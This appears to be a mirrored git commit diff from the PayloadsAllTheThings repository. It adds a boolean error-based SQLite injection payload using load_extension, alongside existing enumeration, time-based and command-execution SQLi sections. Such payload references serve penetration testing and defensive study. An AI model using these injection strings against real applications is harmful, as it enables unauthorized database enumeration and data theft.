mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-29 15:55:25 +00:00
Merge pull request #525 from mrThe/patch-1
Add boolean-error-based vector for the sqlite
This commit is contained in:
commit
38fa931b84
@ -10,6 +10,7 @@
|
|||||||
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
|
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
|
||||||
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
||||||
* [Boolean - Extract info](#boolean---extract-info)
|
* [Boolean - Extract info](#boolean---extract-info)
|
||||||
|
* [Boolean - Error based](#boolean---error-based)
|
||||||
* [Time based](#time-based)
|
* [Time based](#time-based)
|
||||||
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
||||||
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
||||||
@ -71,12 +72,19 @@ and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name
|
|||||||
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Boolean - Error based
|
||||||
|
|
||||||
|
```sql
|
||||||
|
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
|
||||||
|
```
|
||||||
|
|
||||||
## Time based
|
## Time based
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Remote Command Execution using SQLite command - Attach Database
|
## Remote Command Execution using SQLite command - Attach Database
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
@ -96,3 +104,4 @@ Note: By default this component is disabled
|
|||||||
## References
|
## References
|
||||||
|
|
||||||
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
|
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
|
||||||
|
[SQLite Error Based Injection for Enumeration](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
|
||||||
|
Loading…
Reference in New Issue
Block a user